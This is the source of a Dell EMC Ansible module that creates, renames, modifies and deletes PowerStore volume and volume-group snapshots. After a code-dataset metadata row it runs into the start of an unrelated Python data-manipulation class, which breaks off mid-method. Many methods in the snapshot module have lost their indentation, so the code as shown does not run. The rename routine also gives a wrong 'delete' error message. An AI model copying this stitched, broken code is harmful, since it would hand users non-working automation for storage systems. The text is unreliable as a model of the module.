- Prashant Rakheja (prashant.rakheja@dell.com)
extends_documentation_fragment:
- dellemc.dellemc_powerstore
options:
snapshot_name:
description:
- The name of the Snapshot. Either snapshot name or ID is required.
snapshot_id:
description:
- The ID of the Snapshot. Either snapshot ID or name is required.
volume:
description:
- The volume, this could be the volume name or ID.
volume_group:
description:
- The volume group, this could be the volume group name or ID.
new_snapshot_name:
description:
- The new name of the Snapshot.
desired_retention:
description:
- The retention value for the Snapshot.
- If the retention value is not specified, the snap
details would be returned.
- To create a snapshot, either retention or expiration
timestamp must be given.
- If the snap does not have any retention value - specify it as 'None'.
retention_unit:
description:
- The unit for retention.
- If this unit is not specified, 'hours' is taken as default
retention_unit.
- If desired_retention is specified,
expiration_timestamp cannot be specified.
choices: [hours, days]
expiration_timestamp:
description:
- The expiration timestamp of the snapshot. This should be provided in
UTC format, e.g 2019-07-24T10:54:54Z.
description:
description:
- The description for the snapshot.
state:
description:
- Defines whether the Snapshot should exist or not.
required: true
choices: [absent, present]
'''
EXAMPLES = r'''
- name: Create a volume snapshot on PowerStore
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume: "{{volume}}"
description: "{{description}}"
desired_retention: "{{desired_retention}}"
retention_unit: "{{retention_unit_days}}"
state: "{{state_present}}"
- name: Get details of a volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume: "{{volume}}"
state: "{{state_present}}"
- name: Rename volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
new_snapshot_name: "{{new_snapshot_name}}"
volume: "{{volume}}"
state: "{{state_present}}"
- name: Delete volume snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{new_snapshot_name}}"
volume: "{{volume}}"
state: "{{state_absent}}"
- name: Create a volume group snapshot on PowerStore
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
description: "{{description}}"
expiration_timestamp: "{{expiration_timestamp}}"
state: "{{state_present}}"
- name: Get details of a volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_present}}"
- name: Modify volume group snapshot expiration timestamp
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
volume_group: "{{volume_group}}"
description: "{{description}}"
expiration_timestamp: "{{expiration_timestamp_new}}"
state: "{{state_present}}"
- name: Rename volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{snapshot_name}}"
new_snapshot_name: "{{new_snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_present}}"
- name: Delete volume group snapshot
dellemc_powerstore_snapshot:
array_ip: "{{mgmt_ip}}"
verifycert: "{{verifycert}}"
user: "{{user}}"
password: "{{password}}"
snapshot_name: "{{new_snapshot_name}}"
volume_group: "{{volume_group}}"
state: "{{state_absent}}"
'''
RETURN = r'''
'''
# Module-level logger for this Ansible module.
LOG = utils.get_logger('dellemc_powerstore_snapshot',
                       log_devel=logging.INFO)

# Probe the PyPowerStore SDK up front; the results are checked (and the
# module failed cleanly) inside PowerStoreSnapshot.__init__.
py4ps_sdk = utils.has_pyu4ps_sdk()
HAS_PY4PS = py4ps_sdk['HAS_Py4PS']
IMPORT_ERROR = py4ps_sdk['Error_message']

py4ps_version = utils.py4ps_version_check()
IS_SUPPORTED_PY4PS_VERSION = py4ps_version['supported_version']
VERSION_ERROR = py4ps_version['unsupported_version_message']

# Application type reported to the array for auditing.
APPLICATION_TYPE = 'Ansible/1.0'
class PowerStoreSnapshot(object):
"""Class with Snapshot operations"""
def __init__(self):
    """Define all the parameters required by this module"""
    self.module_params = utils.get_powerstore_management_host_parameters()
    self.module_params.update(
        get_powerstore_snapshot_parameters())

    # volume/volume_group, name/id and retention/timestamp are mutually
    # exclusive ways of addressing or configuring the same snapshot.
    mutually_exclusive = [
        ['volume', 'volume_group'], ['snapshot_name', 'snapshot_id'],
        ['desired_retention', 'expiration_timestamp']
    ]
    required_one_of = [
        ['snapshot_name', 'snapshot_id'], ['volume', 'volume_group']
    ]

    # Initialize the Ansible module
    self.module = AnsibleModule(
        argument_spec=self.module_params,
        supports_check_mode=True,
        mutually_exclusive=mutually_exclusive,
        required_one_of=required_one_of
    )
    LOG.info(
        'HAS_PY4PS = {0} , IMPORT_ERROR = {1}'.format(
            HAS_PY4PS, IMPORT_ERROR))
    # Fail fast when the PyPowerStore SDK is missing or too old.
    if HAS_PY4PS is False:
        self.module.fail_json(msg=IMPORT_ERROR)
    LOG.info(
        'IS_SUPPORTED_PY4PS_VERSION = {0} , VERSION_ERROR = {1}'.format(
            IS_SUPPORTED_PY4PS_VERSION,
            VERSION_ERROR))
    if IS_SUPPORTED_PY4PS_VERSION is False:
        self.module.fail_json(msg=VERSION_ERROR)

    # Open the array connection and keep the protection/provisioning
    # sub-clients used by the rest of this class.
    self.py4ps_conn = utils.get_powerstore_connection(self.module.params,
                                                      application_type=APPLICATION_TYPE)
    self.protection = self.py4ps_conn.protection
    self.provisioning = self.py4ps_conn.provisioning
    LOG.info('Got Py4ps instance for PowerStore')
def get_vol_snap_details(self, snapshot):
"""Returns details of a Volume Snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found")
try:
return self.protection.get_volume_snapshot_details(snapshot['id'])
except Exception as e:
self.module.fail_json(msg="Failed to get details of "
"Volume snap: "
"{0} with error {1}".format(
snapshot['name'], str(e)))
def get_vol_group_snap_details(self, snapshot):
"""Returns details of a Volume Group Snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found")
try:
return self.protection.get_volume_group_snapshot_details(
snapshot['id'])
except Exception as e:
self.module.fail_json(msg="Failed to get details of "
"VG snap: "
"{0} with error {1}".format(
snapshot['name'], str(e)))
def get_vol_snapshot(self, volume_id, snapshot_name, snapshot_id):
"""Get the volume snapshot"""
try:
vol_snaps = self.protection.get_volume_snapshots(volume_id)
snapshot = None
for snap in vol_snaps:
if snapshot_name is not None:
if snap['name'] == snapshot_name:
LOG.info("Found snapshot by name: "
"{0}".format(snapshot_name))
snapshot = snap
break
elif snapshot_id is not None:
if snap['id'] == snapshot_id:
LOG.info("Found snapshot by ID: "
"{0}".format(snapshot_id))
snapshot = snap
break
return snapshot
except Exception as e:
LOG.info("Not able to get snapshot details for "
"volume: {0} with error {1}".format(volume_id,
str(e)))
def get_vol_group_snapshot(self, vg_id, snapshot_name, snapshot_id):
"""Get Volume Group Snapshot"""
try:
vg_snaps = self.protection.get_volume_group_snapshots(vg_id)
snapshot = None
for snap in vg_snaps:
if snapshot_name is not None:
if snap['name'] == snapshot_name:
LOG.info("Found snapshot by name: "
"{0}".format(snapshot_name))
snapshot = snap
break
elif snapshot_id is not None:
if snap['id'] == snapshot_id:
LOG.info("Found snapshot by ID: "
"{0}".format(snapshot_id))
snapshot = snap
break
return snapshot
except Exception as e:
LOG.info("Not able to get snapshot details for "
"volume group: {0} with error {1}".format(
vg_id, str(e)))
    def get_vol_id_from_volume(self, volume):
        """Maps the volume to volume ID"""
        # If the value parses as a UUID, try it as an id first; a failed
        # id lookup falls through to the name lookup below.
        is_valid_uuid = self.is_valid_uuid(volume)
        if is_valid_uuid:
            try:
                vol = self.provisioning.get_volume_details(volume)
                return vol['id']
            except Exception as e:
                LOG.info("No volume found by ID: {0}, "
                         "looking it up by name. Error: {1}".format(volume,
                                                                    str(e)))
                pass
        try:
            # Name lookup returns a list; an empty result is fatal.
            vol = \
                self.provisioning.get_volume_by_name(volume)
            if vol:
                return vol[0]['id']
            else:
                self.module.fail_json(
                    msg="Volume {0} was not found on "
                        "the array.".format(volume))
        except Exception as e:
            self.module.fail_json(msg="Failed to get vol {0} by "
                                      "name with error "
                                      "{1}".format(volume, str(e)))
    def get_vol_group_id_from_vg(self, volume_group):
        """Maps the volume group to Volume Group ID"""
        # If the value parses as a UUID, try it as an id first; a failed
        # id lookup falls through to the name lookup below.
        is_valid_uuid = self.is_valid_uuid(volume_group)
        if is_valid_uuid:
            try:
                vg = self.provisioning.get_volume_group_details(
                    volume_group_id=volume_group)
                return vg['id']
            except Exception as e:
                LOG.info("No volume group found by ID: {0}, "
                         "looking it up by name. Error {1}".format(
                             volume_group, str(e)))
                pass
        try:
            # Name lookup returns a list; an empty result is fatal.
            vg = \
                self.provisioning.get_volume_group_by_name(volume_group)
            if vg:
                return vg[0]['id']
            else:
                self.module.fail_json(
                    msg="Volume Group {0} was not found on "
                        "the array.".format(volume_group))
        except Exception as e:
            self.module.fail_json(msg="Failed to get volume group: "
                                      "{0} by name with error: "
                                      "{1}".format(volume_group, str(e)))
def create_vol_snapshot(self, snapshot_name,
description,
volume_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_name):
"""Create a snap for a volume on PowerStore"""
if snapshot_name is None:
self.module.fail_json(msg="Please provide a "
"valid snapshot name.")
if desired_retention is None and expiration_timestamp is None:
self.module.fail_json(msg="Please provide "
"desired_retention or expiration_"
"timestamp for creating a snapshot")
if new_name is not None:
self.module.fail_json(msg="Invalid param: new_name while "
"creating a new snapshot.")
snapshot = self.get_vol_snapshot(volume_id, snapshot_name, None)
if snapshot is not None:
LOG.error("Snapshot: {0} already exists".format(snapshot_name))
return False
if desired_retention is not None and desired_retention != 'None':
if retention_unit is None:
expiration_timestamp = (datetime.utcnow() +
timedelta(
hours=int(desired_retention))
).isoformat() \
+ 'Z'
elif retention_unit == 'days':
expiration_timestamp = (datetime.utcnow() + timedelta(
days=int(desired_retention))).isoformat() + 'Z'
elif retention_unit == 'hours':
expiration_timestamp = (datetime.utcnow() + timedelta(
hours=int(desired_retention))).isoformat() + 'Z'
elif desired_retention == 'None':
expiration_timestamp = None
try:
resp = \
self.protection.create_volume_snapshot(
name=snapshot_name,
description=description,
volume_id=volume_id,
expiration_timestamp=expiration_timestamp)
return True, resp
except Exception as e:
error_message = 'Failed to create snapshot: {0} for ' \
'volume {1} with error: {2}'
LOG.error(error_message.format(snapshot_name,
self.module.params['volume'],
str(e)))
self.module.fail_json(msg=error_message.format(snapshot_name,
self.module.params[
'volume'],
str(e)))
def create_vg_snapshot(self, snapshot_name,
description,
vg_id,
desired_retention,
retention_unit,
expiration_timestamp,
new_name):
"""Create a snap for a VG on PowerStore"""
if snapshot_name is None:
self.module.fail_json(msg="Please provide a "
"valid snapshot name.")
if desired_retention is None and expiration_timestamp is None:
self.module.fail_json(msg="Please provide "
"desired_retention or expiration_"
"timestamp for creating a snapshot")
if new_name is not None:
self.module.fail_json(msg="Invalid param: new_name while "
"creating a new snapshot.")
if desired_retention is not None and desired_retention != 'None':
if retention_unit is None:
expiration_timestamp = (datetime.utcnow() +
timedelta(
hours=int(
desired_retention))).isoformat() \
+ 'Z'
elif retention_unit == 'days':
expiration_timestamp = (datetime.utcnow() + timedelta(
days=int(desired_retention))).isoformat() + 'Z'
elif retention_unit == 'hours':
expiration_timestamp = (datetime.utcnow() + timedelta(
hours=int(desired_retention))).isoformat() + 'Z'
elif desired_retention == 'None':
expiration_timestamp = None
try:
resp = \
self.protection.create_volume_group_snapshot(
name=snapshot_name,
description=description,
volume_group_id=vg_id,
expiration_timestamp=expiration_timestamp)
return True, resp
except Exception as e:
error_message = 'Failed to create snapshot: {0} for ' \
'VG {1} with error: {2}'
LOG.error(error_message.format(snapshot_name,
self.module.params['volume_group'],
str(e)))
self.module.fail_json(msg=error_message.format(
snapshot_name,
self.module.params['volume_group'],
str(e)))
def delete_vol_snapshot(self, snapshot):
"""Deletes a Vol snapshot on PowerStore"""
try:
self.protection.delete_volume_snapshot(snapshot['id'])
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def delete_vol_group_snapshot(self, snapshot):
"""Deletes a Vol group snapshot on PowerStore"""
try:
self.protection.delete_volume_group_snapshot(snapshot['id'])
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def rename_vol_snapshot(self, snapshot, new_name):
"""Renames a vol snapshot"""
# Check if new name is same is present name
if snapshot is None:
self.module.fail_json(msg="Snapshot not found.")
if snapshot['name'] == new_name:
return False
try:
self.protection.modify_volume_snapshot(
snapshot_id=snapshot['id'],
name=new_name)
return True
except Exception as e:
error_message = 'Failed to rename snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
def rename_vol_group_snapshot(self, snapshot, new_name):
"""Renames a vol group snapshot"""
if snapshot is None:
self.module.fail_json(msg="Snapshot not found.")
if snapshot['name'] == new_name:
return False
try:
self.protection.modify_volume_group_snapshot(
snapshot_id=snapshot['id'],
name=new_name)
return True
except Exception as e:
error_message = 'Failed to delete snapshot: {0} with error: {1}'
LOG.error(error_message.format(snapshot['name'], str(e)))
self.module.fail_json(msg=error_message.format(snapshot['name'],
str(e)))
    def check_snapshot_modified(self, snapshot, volume, volume_group,
                                description, desired_retention,
                                retention_unit, expiration_timestamp):
        """Determines whether the snapshot has been modified.

        Returns (modified, details) where details records which of
        description / expiration timestamp changed and the new values.
        """
        LOG.info("Determining if the snap has been modified...")
        # Start from a "nothing changed" template, filled in below.
        snapshot_modification_details = dict()
        snapshot_modification_details['is_description_modified'] = False
        snapshot_modification_details['new_description_value'] = None
        snapshot_modification_details['is_timestamp_modified'] = False
        snapshot_modification_details['new_expiration_timestamp_value'] = None

        if desired_retention is None and expiration_timestamp is None:
            LOG.info("desired_retention and expiration_time are both "
                     "not provided, we don't check for snapshot modification "
                     "in this case. The snapshot details would be returned, "
                     "if available.")
            return False, snapshot_modification_details

        snap_details = None
        if volume is not None:
            snap_details = self.get_vol_snap_details(snapshot)
        elif volume_group is not None:
            snap_details = self.get_vol_group_snap_details(snapshot)
        LOG.debug("The snap details are: {0}".format(snap_details))

        snap_creation_timestamp = None
        if 'creation_timestamp' in snap_details:
            # Only taking into account YYYY-MM-DDTHH-MM, ignoring
            # seconds component.
            snap_creation_timestamp = \
                snap_details['creation_timestamp'][0:16] + 'Z'

        # A relative desired_retention is converted to an absolute
        # expiration, anchored at the snapshot's creation time; the
        # literal string 'None' means "remove the expiration".
        if desired_retention is not None and desired_retention != 'None':
            if retention_unit is None:
                # Default retention unit is hours.
                expiration_timestamp = (datetime.strptime(
                    snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') +
                    timedelta(
                        hours=int(desired_retention))
                ).isoformat() \
                    + 'Z'
            elif retention_unit == 'days':
                expiration_timestamp = (datetime.strptime(
                    snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') + timedelta(
                    days=int(desired_retention))).isoformat() + 'Z'
            elif retention_unit == 'hours':
                expiration_timestamp = (datetime.strptime(
                    snap_creation_timestamp, '%Y-%m-%dT%H:%MZ') + timedelta(
                    hours=int(desired_retention))).isoformat() + 'Z'
        elif desired_retention == 'None':
            expiration_timestamp = None

        LOG.info("The new expiration timestamp is {0}".format(
            expiration_timestamp))

        modified = False
        # Case 1: both sides carry a timestamp -> compare minute-precision
        # values with a two-minute tolerance.
        if 'expiration_timestamp' in snap_details['protection_data'] \
                and snap_details['protection_data']['expiration_timestamp'] \
                is not None and expiration_timestamp is not None:
            # Only taking into account YYYY-MM-DDTHH-MM, ignoring
            # seconds component.
            if snap_details['protection_data']['expiration_timestamp'][0:16] \
                    != expiration_timestamp[0:16]:
                # We can tolerate a delta of two minutes.
                existing_timestamp = \
                    snap_details['protection_data']['expiration_timestamp'][
                        0:16] + 'Z'
                new_timestamp = expiration_timestamp[0:16] + 'Z'

                existing_time_obj = datetime.strptime(existing_timestamp,
                                                      '%Y-%m-%dT%H:%MZ')
                new_time_obj = datetime.strptime(new_timestamp,
                                                 '%Y-%m-%dT%H:%MZ')

                if existing_time_obj > new_time_obj:
                    td = existing_time_obj - new_time_obj
                else:
                    td = new_time_obj - existing_time_obj

                td_mins = int(round(td.total_seconds() / 60))

                if td_mins > 2:
                    snapshot_modification_details[
                        'is_timestamp_modified'] = True
                    snapshot_modification_details[
                        'new_expiration_timestamp_value'] = \
                        expiration_timestamp
                    modified = True
        # Case 2: array has no timestamp key and a new one was requested.
        elif 'expiration_timestamp' not in snap_details['protection_data'] \
                and expiration_timestamp is not None:
            snapshot_modification_details['is_timestamp_modified'] = True
            snapshot_modification_details[
                'new_expiration_timestamp_value'] = expiration_timestamp
            modified = True
        # Case 3: removal of an existing expiration was requested.
        elif 'expiration_timestamp' in snap_details['protection_data'] \
                and expiration_timestamp is None:
            if snap_details['protection_data'][
                    'expiration_timestamp'] is not None:
                snapshot_modification_details['is_timestamp_modified'] = True
                snapshot_modification_details[
                    'new_expiration_timestamp_value'] = expiration_timestamp
                modified = True
        # Case 4: key present but null on the array, new value requested.
        elif 'expiration_timestamp' in snap_details['protection_data'] and \
                snap_details['protection_data']['expiration_timestamp'] is \
                None and expiration_timestamp is not None:
            snapshot_modification_details['is_timestamp_modified'] = True
            snapshot_modification_details[
                'new_expiration_timestamp_value'] = expiration_timestamp
            modified = True

        # Description change is checked independently of the timestamp.
        if 'description' in snap_details and description is not None:
            if snap_details['description'] != description:
                snapshot_modification_details['is_description_modified'] = \
                    True
                snapshot_modification_details['new_description_value'] \
                    = description
                modified = True

        LOG.info("Snapshot modified {0}, modification details: {1}"
                 .format(modified, snapshot_modification_details))
        return modified, snapshot_modification_details
    def modify_vol_snapshot(self, snapshot,
                            snapshot_modification_details):
        """Modify a volume snapshot.

        Applies the description and/or expiration changes computed by
        check_snapshot_modified(); returns (changed, details-or-None).
        """
        try:
            changed = False
            if snapshot_modification_details['is_description_modified']:
                new_description = \
                    snapshot_modification_details['new_description_value']
                self.protection.modify_volume_snapshot(
                    snapshot_id=snapshot['id'],
                    description=new_description)
                changed = True
            if snapshot_modification_details['is_timestamp_modified']:
                new_timestamp = \
                    snapshot_modification_details[
                        'new_expiration_timestamp_value']
                self.protection.modify_volume_snapshot(
                    snapshot_id=snapshot['id'],
                    expiration_timestamp=new_timestamp)
                changed = True
            if changed:
                # Re-read so the caller reports post-modification state.
                resp = self.get_vol_snap_details(
                    snapshot)
                return changed, resp
            else:
                return changed, None
        except Exception as e:
            error_message = 'Failed to modify snapshot {0} with error {1}'
            LOG.info(error_message.format(snapshot['name'], str(e)))
            self.module.fail_json(
                msg=error_message.format(snapshot['name'], str(e)))
    def modify_vol_group_snapshot(self, snapshot,
                                  snapshot_modification_details):
        """Modify a volume group snapshot.

        Applies the description and/or expiration changes computed by
        check_snapshot_modified(); returns (changed, details-or-None).
        """
        try:
            changed = False
            if snapshot_modification_details['is_description_modified']:
                new_description = \
                    snapshot_modification_details['new_description_value']
                self.protection.modify_volume_group_snapshot(
                    snapshot_id=snapshot['id'],
                    description=new_description)
                changed = True
            if snapshot_modification_details['is_timestamp_modified']:
                new_timestamp = \
                    snapshot_modification_details[
                        'new_expiration_timestamp_value']
                self.protection.modify_volume_group_snapshot(
                    snapshot_id=snapshot['id'],
                    expiration_timestamp=new_timestamp)
                changed = True
            if changed:
                # Re-read so the caller reports post-modification state.
                resp = self.get_vol_group_snap_details(
                    snapshot)
                return changed, resp
            else:
                return changed, None
        except Exception as e:
            error_message = 'Failed to modify snapshot {0} with error {1}'
            LOG.info(error_message.format(snapshot['name'], str(e)))
            self.module.fail_json(msg=error_message.format(snapshot['name'],
                                                           str(e)))
def is_valid_uuid(self, val):
"""Determines if the string is a valid UUID"""
try:
UUID(str(val))
return True
except ValueError:
return False
def validate_expiration_timestamp(self, expiration_timestamp):
"""Validates whether the expiration timestamp is valid"""
try:
datetime.strptime(expiration_timestamp,
'%Y-%m-%dT%H:%M:%SZ')
except ValueError:
self.module.fail_json(msg='Incorrect date format, '
'should be YYYY-MM-DDTHH:MM:SSZ')
def validate_desired_retention(self, desired_retention):
"""Validates the specified desired retention"""
try:
int(desired_retention)
except ValueError:
if desired_retention == 'None':
LOG.info("Desired retention is set to 'None'")
else:
self.module.fail_json(msg="Please provide a valid integer"
" as the desired retention.")
    def perform_module_operation(self):
        """
        Perform different actions on VG or volume Snapshot based on user
        parameter chosen in playbook
        """
        volume = self.module.params['volume']
        volume_group = self.module.params['volume_group']
        snapshot_name = self.module.params['snapshot_name']
        snapshot_id = self.module.params['snapshot_id']
        new_snapshot_name = self.module.params['new_snapshot_name']
        desired_retention = self.module.params['desired_retention']
        retention_unit = self.module.params['retention_unit']
        expiration_timestamp = self.module.params['expiration_timestamp']
        description = self.module.params['description']
        state = self.module.params['state']

        # Per-action flags collected here; any truthy flag => changed=True.
        result = dict(
            changed=False,
            create_vg_snap='',
            delete_vg_snap='',
            modify_vg_snap='',
            create_vol_snap='',
            delete_vol_snap='',
            modify_vol_snap='',
            snap_details='',
        )

        snapshot = None
        volume_id = None
        volume_group_id = None

        # Input validation first; both validators call fail_json on error.
        if expiration_timestamp is not None:
            self.validate_expiration_timestamp(expiration_timestamp)

        if desired_retention is not None:
            self.validate_desired_retention(desired_retention)

        # Resolve the owner (volume or VG) name-or-id to an array id.
        if volume is not None:
            volume_id = self.get_vol_id_from_volume(volume)
        elif volume_group is not None:
            volume_group_id = self.get_vol_group_id_from_vg(volume_group)

        # Look up the snapshot itself (None when it does not exist).
        if volume is not None:
            snapshot = self.get_vol_snapshot(volume_id, snapshot_name,
                                             snapshot_id)
        elif volume_group is not None:
            snapshot = self.get_vol_group_snapshot(volume_group_id,
                                                   snapshot_name,
                                                   snapshot_id)

        is_snap_modified = False
        snapshot_modification_details = dict()
        if snapshot is not None:
            is_snap_modified, snapshot_modification_details = \
                self.check_snapshot_modified(snapshot,
                                             volume,
                                             volume_group,
                                             description,
                                             desired_retention,
                                             retention_unit,
                                             expiration_timestamp)

        # --- create / delete for volume snapshots ---
        if state == 'present' and volume and not snapshot:
            LOG.info("Creating new snapshot: {0} for volume: {1}".format(
                snapshot_name, volume))
            result['create_vol_snap'], result['snap_details'] = \
                self.create_vol_snapshot(snapshot_name,
                                         description,
                                         volume_id,
                                         desired_retention,
                                         retention_unit,
                                         expiration_timestamp,
                                         new_snapshot_name)
        elif state == 'absent' and (snapshot_name or snapshot_id) and \
                volume and snapshot:
            LOG.info("Deleting snapshot {0} for Volume {1}".format(
                snapshot['name'], volume))
            result['delete_vol_snap'] = \
                self.delete_vol_snapshot(snapshot)

        # --- create / delete for volume-group snapshots ---
        if state == 'present' and volume_group and not snapshot:
            LOG.info("Creating new snapshot: {0} for VG: {1}".format(
                snapshot_name, volume_group))
            result['create_vg_snap'], result['snap_details'] = \
                self.create_vg_snapshot(snapshot_name,
                                        description,
                                        volume_group_id,
                                        desired_retention,
                                        retention_unit,
                                        expiration_timestamp,
                                        new_snapshot_name)
        elif state == 'absent' and (
                snapshot_name or snapshot_id) and volume_group \
                and snapshot:
            LOG.info("Deleting snapshot {0} for VG {1}".format(
                snapshot['name'], volume_group))
            result['delete_vg_snap'] = \
                self.delete_vol_group_snapshot(snapshot)

        # --- rename ---
        # NOTE(review): when new_snapshot_name is set but the snapshot was
        # not found, snapshot is None and snapshot['name'] in the LOG call
        # below would raise before rename_* can fail_json — confirm this
        # path is unreachable given the create branches above.
        if state == 'present' and volume and new_snapshot_name:
            LOG.info("Renaming snapshot {0} to new name {1}".format(
                snapshot['name'], new_snapshot_name))
            result['modify_vol_snap'] = self.rename_vol_snapshot(
                snapshot, new_snapshot_name)
        elif state == 'present' and volume_group \
                and new_snapshot_name:
            LOG.info("Renaming snapshot {0} to new name {1}".format(
                snapshot['name'], new_snapshot_name))
            result['modify_vg_snap'] = self.rename_vol_group_snapshot(
                snapshot, new_snapshot_name)

        # --- description / expiration modification ---
        if state == 'present' and snapshot and volume and is_snap_modified:
            LOG.info("Modifying snapshot {0}".format(snapshot['name']))
            result['modify_vol_snap'], result['snap_details'] = \
                self.modify_vol_snapshot(snapshot,
                                         snapshot_modification_details) or \
                result['modify_vol_snap']
        elif state == 'present' and snapshot and volume_group \
                and is_snap_modified:
            LOG.info("Modifying snapshot {0}".format(snapshot['name']))
            result['modify_vg_snap'], result['snap_details'] = \
                self.modify_vol_group_snapshot(
                    snapshot,
                    snapshot_modification_details) or \
                result['modify_vg_snap']

        # --- pure "get" case: no retention input means report-only ---
        if state == 'present' and (snapshot_name or snapshot_id) and volume \
                and not desired_retention \
                and not expiration_timestamp:
            result['snap_details'] = self.get_vol_snap_details(snapshot)
        elif state == 'present' and (snapshot_name or snapshot_id) \
                and volume_group and not desired_retention \
                and not expiration_timestamp:
            result['snap_details'] = self.get_vol_group_snap_details(
                snapshot)

        if result['create_vol_snap'] or result['delete_vol_snap'] or result[
                'modify_vol_snap'] or result['create_vg_snap'] \
                or result['delete_vg_snap'] or result['modify_vg_snap']:
            result['changed'] = True

        # Finally update the module result!
        self.module.exit_json(**result)
def get_powerstore_snapshot_parameters():
    """Argument spec for this module (merged with the common host params)."""
    spec = {
        'volume_group': dict(required=False, type='str'),
        'volume': dict(required=False, type='str'),
        'snapshot_name': dict(required=False, type='str'),
        'snapshot_id': dict(required=False, type='str'),
        'new_snapshot_name': dict(required=False, type='str'),
        'desired_retention': dict(required=False, type='str'),
        'retention_unit': dict(required=False, choices=['hours', 'days'],
                               type='str'),
        'expiration_timestamp': dict(required=False, type='str'),
        'description': dict(required=False, type='str'),
        'state': dict(required=True, choices=['present', 'absent'],
                      type='str'),
    }
    return spec
def main():
    """Create PowerStore Snapshot object and perform action on it
    based on user input from playbook"""
    obj = PowerStoreSnapshot()
    obj.perform_module_operation()


if __name__ == '__main__':
    main()
| avs6/ansible-powerstore | dellemc_ansible/powerstore/library/dellemc_powerstore_snapshot.py | dellemc_powerstore_snapshot.py | py | 39,907 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "ansible.module_utils.dellemc_ansible_utils.get_logger",
"line_number": 184,
"usage_type": "call"
},
{
"api_name": "ansible.module_utils.dellemc_ansible_utils",
"line_number": 184,
"usage_type": "name"
},
{
"api_name": "logging.INFO",
"line_number": 185,
"us... |
13918851672 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 3 13:07:13 2018
@author: marcos
"""
import pandas as pd
import csv
import pickle as pkl
import numpy as np
import scipy.stats as sts
from sklearn import preprocessing as prep
# =============================================================================
# Data Manipulation Tool
# =============================================================================
class DMT(object):
    """Data Manipulation Tool: a thin wrapper around a pandas DataFrame
    with load/save helpers, normalization, outlier splitting and stats."""

    def __init__(self, database_file, file_format='csv', sep=',', decimal='.', orient='index'):
        # file_format: 'csv', 'json' or 'dict' (a pickled dict).
        # orient: passed to pandas dict/json conversions throughout.
        self.file = database_file
        self.file_format = file_format
        self.sep = sep
        self.decimal = decimal
        self.orient = orient
        self.classes = None        # label vector split off by set_class()
        self.minima = None         # per-column minima captured by normalize()
        self.maxima = None         # per-column maxima captured by normalize()
        self.outliers_inf = None   # rows removed below range by split_outliers()
        self.outliers_sup = None   # rows removed above range by split_outliers()
        self.normalized = False    # guards normalize()/denormalize()
        # _index is used for iterator
        self._index = 0
        if self.file_format == 'csv':
            self.df = pd.read_csv(self.file, sep=self.sep)
        elif self.file_format == 'json':
            self.df = pd.read_json(self.file)
        elif self.file_format == 'dict':
            # NOTE(review): the pickle handle is never closed, and an
            # unknown file_format leaves self.df unset — confirm intended.
            persisted_dict = pkl.load(open(database_file, 'rb'))
            self.df = pd.DataFrame.from_dict(persisted_dict, orient=self.orient)
############ I/O and Import/Export Methods ####################
def print_summary(self):
print(' Summary of stored data:')
print('-------------------------------------')
print('%8s | %15s | %8s' % ('Id', 'Name', 'Type'))
print('-------------------------------------')
for i,col in enumerate(self.df.dtypes):
print('%8d | %15s | %8s' % (i, self.df.columns[i], col))
print('-------------------------------------')
print()
def save_csv(self, output_file, numeric_only=False):
if numeric_only:
data = self.get_numeric_data()
else:
data = self.df
data.to_csv(output_file, sep=self.sep, decimal=self.decimal, quoting=csv.QUOTE_NONNUMERIC, index=False)
def save_json(self, output_file, orient='index', numeric_only=False):
if numeric_only:
data = self.get_numeric_data()
else:
data = self.df
data.to_json(output_file, orient=self.orient)
def save_dict(self, output_file, numeric_only=False):
if numeric_only:
data = self.get_numeric_data()
else:
data = self.df
pkl.dump(data.to_dict(orient=self.orient), open(output_file, 'wb'))
def get_json(self, numeric_only=False):
if numeric_only:
data = self.get_numeric_data()
else:
data = self.df
return data.to_json(orient=self.orient)
def get_dict(self, numeric_only=False):
if numeric_only:
data = self.get_numeric_data()
else:
data = self.df
return data.to_dict(orient=self.orient)
############ Column or row manipulation Methods ####################
def drop_columns(self, col_list):
self.df = self.df.drop(columns=col_list)
def set_class(self, column, categorical=True):
if categorical:
self.set_categorical(column)
self.classes = self.df[column].copy()
self.df.drop(columns=[column], inplace=True)
    def is_classes_set(self):
